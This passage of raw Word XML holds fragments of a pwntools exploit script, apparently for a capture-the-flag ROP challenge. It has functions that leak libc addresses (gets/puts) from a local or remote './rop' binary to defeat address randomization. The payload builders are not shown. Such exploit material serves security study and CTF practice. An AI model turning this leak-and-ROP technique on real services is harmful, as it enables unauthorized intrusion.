            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="272FCC17" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>#p.send(pld)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB554C9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A829955" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#cf = p.corefile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F412487" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21230FEF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def leaky(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="592702D6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A4C2BA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(leakGets())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CF447D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71837754" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B85BE89" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34EB72B3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479C0A34" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak -= 0xa000000000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48404A2D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("Gets leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656A7FA8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B02BAB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E881E95" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def testLeak():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6709FD56" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process('/bin/bash')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0548C9D3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline('gdb ./rop -q')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5473679D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("set disable-randomization off")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A5AC235" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.sendline("break *0x0040064a") # Break at ret in main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D952BB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recv()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A47A3DA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.clean(timeout=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3965CCD2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="116F59FA" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77DB7C72" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(leakGets())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A421D32" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1566E3B4" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273A3062" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E5ED7B8" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1786AFEC" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("puts leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2517B0CD" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E66791" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1FD6E7" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline("r")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128442B9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77006EC6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.sendline(leakPuts())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A68B47" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E3A0B9F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33DC8AA9" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC03C34" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD26352" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>log.info("puts leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6538FEC1" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56921445" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2072F5" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20E6FD51" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def localLeak():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5890DDDF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = process("./rop")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="489C9EDC" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>context.log_level = 'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B873883" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D8FC438" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F676EE3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>leaky(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E15CC6F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0550B397" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def remoteLeak():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0406659A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>p = remote(HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04746BD6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>context.log_level = 'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0159AEA3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688D580A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>#p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117753A6" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:tab/>
              <w:t>leaky(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D0C858" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49A2A4EB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F9DBA1D" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>def mainLinePld():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F9D635" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B24F36">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:tab/>
              <w:t>binary = context.binary = ELF('./rop', checksec=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9B89D7" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRPr="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
